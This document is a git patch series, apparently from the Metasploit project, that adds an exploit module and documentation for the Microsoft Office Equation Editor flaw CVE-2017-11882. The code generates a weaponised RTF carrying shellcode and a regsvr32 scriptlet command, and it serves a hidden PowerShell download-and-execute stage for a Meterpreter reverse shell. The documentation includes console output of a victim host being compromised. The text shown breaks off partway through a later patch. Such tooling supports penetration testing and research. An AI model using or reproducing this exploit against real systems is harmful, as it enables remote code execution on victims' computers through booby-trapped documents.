From fcf2cfa13431fbf4c12275c5a9a54489c396e608 Mon Sep 17 00:00:00 2001
From: Austin <30811388+realoriginal@users.noreply.github.com>
Date: Tue, 21 Nov 2017 14:45:56 -0500
Subject: [PATCH 01/12] Create office_ms17_11882.md
---
.../windows/fileformat/office_ms17_11882.md | 56 +++++++++++++++++++
1 file changed, 56 insertions(+)
create mode 100644 documentation/modules/exploit/windows/fileformat/office_ms17_11882.md
diff --git a/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md b/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md
new file mode 100644
index 000000000000..b6b3ae81c6c1
--- /dev/null
+++ b/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md
@@ -0,0 +1,56 @@
+Office products within the last 17 years allow an attacker to execute arbitrary commands through memory corruption in Office documents. This occurs in how MS office fails to properly handle OLE objects in memory. Requires an victim
+to open an MS `.rtf` file. In addition for the payload to be executed, the user must not open as read-only. Otherwise requires no interaction beyond that from the user.
+
+## Vulnerable Application
+
+- Microsoft Office 2016
+- Microsoft Office 2013 Service Pack 1
+- Microsoft Office 2010 Service Pack 2
+- Microsoft Office 2007
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use exploit/windows/fileformat/office_ms17_11882`
+3. Do: `set PAYLOAD [PAYLOAD]`
+4. Do: `run`
+
+## Options
+### FILENAME
+Filename to output, and location to which should be written.
+
+
+## Example
+
+```
+msf > use exploit/windows/fileformat/office_ms17_11882
+msf exploit(office_ms17_11882) > set FILENAME /home/mumbai/file.rtf
+FILENAME => /home/mumbai/file.rtf
+msf exploit(office_ms17_11882) > set LHOST ens3
+LHOST => ens3
+msf exploit(office_ms17_11882) > set LPORT 35116
+LPORT => 35116
+msf exploit(office_ms17_11882) > run
+[*] Exploit running as background job 0.
+
+[*] Started reverse TCP handler on 192.168.0.11:35116
+msf exploit(office_ms17_11882) > [*] Using URL: http://0.0.0.0:8080/e08qBLfVxgaJZPo
+[*] Local IP: http://192.168.0.11:8080/e08qBLfVxgaJZPo
+[*] Server started.
+[*] 192.168.0.24 office_ms17_11882 - Handling initial request from 192.168.0.24
+[*] 192.168.0.24 office_ms17_11882 - Stage two requestd, sending
+[*] Sending stage (205379 bytes) to 192.168.0.24
+[*] Meterpreter session 1 opened (192.168.0.11:35116 -> 192.168.0.24:52217) at 2017-11-21 14:41:59 -0500
+sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer : TEST-PC
+OS : Windows 7 (Build 7601, Service Pack 1).
+Architecture : x64
+System Language : en_US
+Domain : WORKGROUP
+Logged On Users : 1
+Meterpreter : x64/windows
+meterpreter >
+```
From 39a4d193a17c6f85846a58a429c0914f542bded2 Mon Sep 17 00:00:00 2001
From: Austin <30811388+realoriginal@users.noreply.github.com>
Date: Tue, 21 Nov 2017 14:47:02 -0500
Subject: [PATCH 02/12] Create office_ms17_11882.rb
---
.../windows/fileformat/office_ms17_11882.rb | 210 ++++++++++++++++++
1 file changed, 210 insertions(+)
create mode 100644 modules/exploits/windows/fileformat/office_ms17_11882.rb
diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb
new file mode 100644
index 000000000000..e5f44235ec1a
--- /dev/null
+++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb
@@ -0,0 +1,210 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ManualRanking
+
+ include Msf::Exploit::Remote::HttpServer
+ include Msf::Exploit::Powershell
+ include Msf::Exploit::EXE
+
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Microsoft Office CVE-2017-11882',
+ 'Description' => %q{
+ Module exploits a flaw in the Equation Editor, developed
+ in 2000, that allowed any OLE object to execute in a separate
+ address space. Compared to original PoC, allows for a command within
+ a length of 109 bytes to be executed Affects Microsoft Office word for the latest
+ 17 years.
+ },
+ 'Author' => ['mumbai', 'embedi', 'BlackMathIT'],
+ 'License' => MSF_LICENSE,
+ 'DisclosureDate' => 'Nov 15 2017',
+ 'References' => [
+ ['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'],
+ ['URL', 'https://github.com/embedi/CVE-2017-11882'],
+ ['URL', 'https://github.com/BlackMathIT/2017-11882_Generator/blob/master/2017-11882_Generator.py']
+ ],
+ 'Platform' => 'win',
+ 'Arch' => [ARCH_X86, ARCH_X64],
+ 'Targets' => [
+ ['Automatic', {} ],
+ ],
+ 'DefaultTarget' => 0,
+ 'Payload' => {
+ 'DisableNops' => true
+ },
+ 'DefaultOptions' => {
+ 'EXITFUNC' => 'thread',
+ 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+ }
+ ))
+
+ register_options([
+ OptString.new("FILENAME", [true, "Filename to save as"])
+ ])
+ end
+
+
+
+ def generate_rtf
+ header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n"
+ header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n"
+ header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata '
+ header << '01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'
+ header << '0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'
+ header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'
+ header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e007400720079000000000000000000000000000000000000000000000000000000'
+ header << '00000000000000000000000000000000000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000000000000000008020ce'
+ header << 'a5613cd30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000'
+ header << '000000000000000000000000000000000a000201ffffffffffffffffffffffff000000000000000000000000000000000000000000000000000000000000000000'
+ header << '000000000000001400000000000000010043006f006d0070004f0062006a0000000000000000000000000000000000000000000000000000000000000000000000'
+ header << '0000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000'
+ header << '0001000000660000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000'
+ header << '00000000000000000000000012000201ffffffff04000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000003'
+ header << '0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'ffffff0100000208000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
+ header << '00000100feff030a0000ffffffff02ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'
+ header << '71756174696f6e000b0000004571756174696f6e2e3300f439b2710000000000000000000000000000000000000000000000000000000000000000000000000000'
+ header << "00000300040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\n"
+
+ footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
+ footer << '4500710075006100740069006F006E0020004E00610074006900760065000000000000000000000000000000000000000000000000000000000000'
+ footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000400'
+ footer << '0000C50000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
+ footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000'
+ footer << '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
+ footer << '0000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000'
+ footer << '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
+ footer << '000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000'
+ footer << '0000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000D0000004D45544146494C'
+ footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C500000002001C0000000000050000000902000000000500000002'
+ footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF'
+ footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090'
+ footer << '01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016'
+ footer << '0A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A00000031313131313131'
+ footer << '3131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB02100007000000'
+ footer << '0000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F00100'
+ footer << '00030000000000' + "\n"
+ footer << '}{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260' + "\n"
+ footer << "0100090000039e00000002001c0000000000050000000902000000000500000002010100000005\n"
+ footer << "0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002\n"
+ footer << "1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000\n"
+ footer << "0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000\n"
+ footer << "0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000\n"
+ footer << "002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100\n"
+ footer << "000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a\n"
+ footer << "0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300\n"
+ footer << "00000000\n"
+ footer << "}}}\n"
+ footer << '\par}' + "\n"
+
+ shellcode = "\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00\xc8\xa7\\\x00\xc4\xee[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ"
+ shellcode << "\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53\x66\x83\xEE\x4C\xFF\x10"
+ shellcode << "\x90\x90"
+
+ payload = shellcode
+ payload += [0x00402114].pack("V")
+ payload += "\x00" * 2
+ payload += "regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll"
+ payload = (payload + ("\x00" * (197 - payload.length))).unpack('H*').first
+ payload = header + payload + footer
+
+ rtf = File.new(datastore['FILENAME'], 'w')
+ rtf.write(payload)
+ rtf.close
+ rtf
+ end
+
+
+
+ def gen_psh(url, *method)
+ ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
+
+ if method.include? 'string'
+ download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))
+ else
+ # Random filename to use, if there isn't anything set
+ random = "#{rand_text_alphanumeric 8}.exe"
+ # Set filename (Use random filename if empty)
+ filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']
+
+ # Set path (Use %TEMP% if empty)
+ path = datastore['BinaryEXE-PATH'].blank? ? "$env:temp" : %Q('#{datastore['BinaryEXE-PATH']}')
+
+ # Join Path and Filename
+ file = %Q(echo (#{path}+'\\#{filename}'))
+
+ # Generate download PowerShell command
+ download_string = Rex::Powershell::PshMethods.download_run(url, file)
+ end
+
+ download_and_run = "#{ignore_cert}#{download_string}"
+
+ # Generate main PowerShell command
+ return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)
+ end
+
+ def on_request_uri(cli, _request)
+ if _request.raw_uri =~ /\.sct$/
+ print_status("Handling initial request from #{cli.peerhost}")
+ payload = gen_psh("#{get_uri}", "string")
+ data = gen_sct_file(payload)
+ send_response(cli, data, 'Content-Type' => 'text/plain')
+ else
+ print_status("Stage two requested, sending...")
+ p = regenerate_payload(cli)
+ data = cmd_psh_payload(p.encoded,
+ payload_instance.arch.first,
+ remove_comspec: true,
+ exec_in_place: true
+ )
+ send_response(cli, data, 'Content-Type' => 'application/octet-stream')
+ end
+ end
+
+
+ def rand_class_id
+ "#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}"
+ end
+
+
+ def gen_sct_file(command)
+ # If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error).
+ if command == ''
+ return %{}
+ # If a command is provided, tell the target system to execute it.
+ else
+ return %{}
+ end
+ end
+
+
+ def primer
+ generate_rtf
+ end
+end
From fcea6fd8d4af65ee9f308c5e149caf294d5a4eb9 Mon Sep 17 00:00:00 2001
From: Austin <30811388+realoriginal@users.noreply.github.com>
Date: Tue, 21 Nov 2017 15:00:06 -0500
Subject: [PATCH 03/12] actually create new file ;-;
---
modules/exploits/windows/fileformat/office_ms17_11882.rb | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb
index e5f44235ec1a..83995534f220 100644
--- a/modules/exploits/windows/fileformat/office_ms17_11882.rb
+++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb
@@ -134,10 +134,10 @@ def generate_rtf
payload = (payload + ("\x00" * (197 - payload.length))).unpack('H*').first
payload = header + payload + footer
- rtf = File.new(datastore['FILENAME'], 'w')
- rtf.write(payload)
- rtf.close
- rtf
+ ::File.open(datastore['FILENAME'], 'wb') do |fd|
+ fd.write(payload)
+ fd.close
+ end
end
From db4c0fcca989162c12c1e811660cfb63f9083259 Mon Sep 17 00:00:00 2001
From: Austin <30811388+realoriginal@users.noreply.github.com>
Date: Tue, 21 Nov 2017 19:02:14 -0500
Subject: [PATCH 04/12] spelling
---
modules/exploits/windows/fileformat/office_ms17_11882.rb | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb
index 83995534f220..9592fbad757e 100644
--- a/modules/exploits/windows/fileformat/office_ms17_11882.rb
+++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb
@@ -171,12 +171,12 @@ def gen_psh(url, *method)
def on_request_uri(cli, _request)
if _request.raw_uri =~ /\.sct$/
- print_status("Handling initial request from #{cli.peerhost}")
+ print_status("Handling request for .sct from #{cli.peerhost}")
payload = gen_psh("#{get_uri}", "string")
data = gen_sct_file(payload)
send_response(cli, data, 'Content-Type' => 'text/plain')
else
- print_status("Stage two requested, sending...")
+ print_status("Delivering payload...")
p = regenerate_payload(cli)
data = cmd_psh_payload(p.encoded,
payload_instance.arch.first,
From 275f70e77e9decfd42ca6d67be3ea840f67876e1 Mon Sep 17 00:00:00 2001
From: Austin <30811388+realoriginal@users.noreply.github.com>
Date: Tue, 21 Nov 2017 19:34:04 -0500
Subject: [PATCH 05/12] better saving
---
modules/exploits/windows/fileformat/office_ms17_11882.rb | 8 +++++---
1 file changed, 5 insertions(+), 3 deletions(-)
diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb
index 9592fbad757e..1e52fcc476a2 100644
--- a/modules/exploits/windows/fileformat/office_ms17_11882.rb
+++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb
@@ -45,7 +45,7 @@ def initialize(info = {})
))
register_options([
- OptString.new("FILENAME", [true, "Filename to save as"])
+ OptString.new("FILENAME", [true, "Filename to save as", "msf.rtf"])
])
end
@@ -134,10 +134,12 @@ def generate_rtf
payload = (payload + ("\x00" * (197 - payload.length))).unpack('H*').first
payload = header + payload + footer
- ::File.open(datastore['FILENAME'], 'wb') do |fd|
+ path = ::File.join(Msf::Config.local_directory, datastore['FILENAME'])
+ ::File.open(path, 'wb') do |fd|
fd.write(payload)
fd.close
end
+ print_good("Wrote payload to #{path}")
end
@@ -176,7 +178,7 @@ def on_request_uri(cli, _request)
data = gen_sct_file(payload)
send_response(cli, data, 'Content-Type' => 'text/plain')
else
- print_status("Delivering payload...")
+ print_status("Delivering payload to #{cli.peerhost}...")
p = regenerate_payload(cli)
data = cmd_psh_payload(p.encoded,
payload_instance.arch.first,
From 960893b99dca4f845cce067319c26d68b5914d8b Mon Sep 17 00:00:00 2001
From: Austin <30811388+realoriginal@users.noreply.github.com>
Date: Wed, 22 Nov 2017 06:36:46 -0500
Subject: [PATCH 06/12] change default payload
---
modules/exploits/windows/fileformat/office_ms17_11882.rb | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb
index 1e52fcc476a2..f87d1032fbaf 100644
--- a/modules/exploits/windows/fileformat/office_ms17_11882.rb
+++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb
@@ -40,7 +40,7 @@ def initialize(info = {})
},
'DefaultOptions' => {
'EXITFUNC' => 'thread',
- 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+ 'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
}
))
From cb7f173811af79d7b8393bd2cfa33a46488e7e1f Mon Sep 17 00:00:00 2001
From: Austin <30811388+realoriginal@users.noreply.github.com>
Date: Tue, 28 Nov 2017 21:36:25 -0500
Subject: [PATCH 07/12] Update office_ms17_11882.rb
---
.../windows/fileformat/office_ms17_11882.rb | 160 +++++++++++-------
1 file changed, 103 insertions(+), 57 deletions(-)
diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb
index f87d1032fbaf..47d486f73444 100644
--- a/modules/exploits/windows/fileformat/office_ms17_11882.rb
+++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::Powershell
include Msf::Exploit::EXE
+ include Msf::Exploit::FILEFORMAT
def initialize(info = {})
@@ -38,6 +39,7 @@ def initialize(info = {})
'Payload' => {
'DisableNops' => true
},
+ 'Stance' => Msf::Exploit::Stance::Aggressive,
'DefaultOptions' => {
'EXITFUNC' => 'thread',
'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
@@ -55,54 +57,107 @@ def generate_rtf
header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n"
header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n"
header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata '
- header << '01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'
- header << '0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'
- header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'
- header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e007400720079000000000000000000000000000000000000000000000000000000'
- header << '00000000000000000000000000000000000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000000000000000008020ce'
- header << 'a5613cd30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000'
- header << '000000000000000000000000000000000a000201ffffffffffffffffffffffff000000000000000000000000000000000000000000000000000000000000000000'
- header << '000000000000001400000000000000010043006f006d0070004f0062006a0000000000000000000000000000000000000000000000000000000000000000000000'
- header << '0000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000'
- header << '0001000000660000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000'
- header << '00000000000000000000000012000201ffffffff04000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000003'
- header << '0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 'ffffff0100000208000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
- header << '00000100feff030a0000ffffffff02ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'
- header << '71756174696f6e000b0000004571756174696f6e2e3300f439b2710000000000000000000000000000000000000000000000000000000000000000000000000000'
- header << "00000300040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\n"
+ header << '01050000020000000b0000004571756174696f6e2e33000000000000000000000'
+ header << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'
+ header << '09000600000000000000000000000100000001000000000000000010000002000'
+ header << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040'
+ header << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+ header << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0'
+ header << '07400720079000000000000000000000000000000000000000000000000000000'
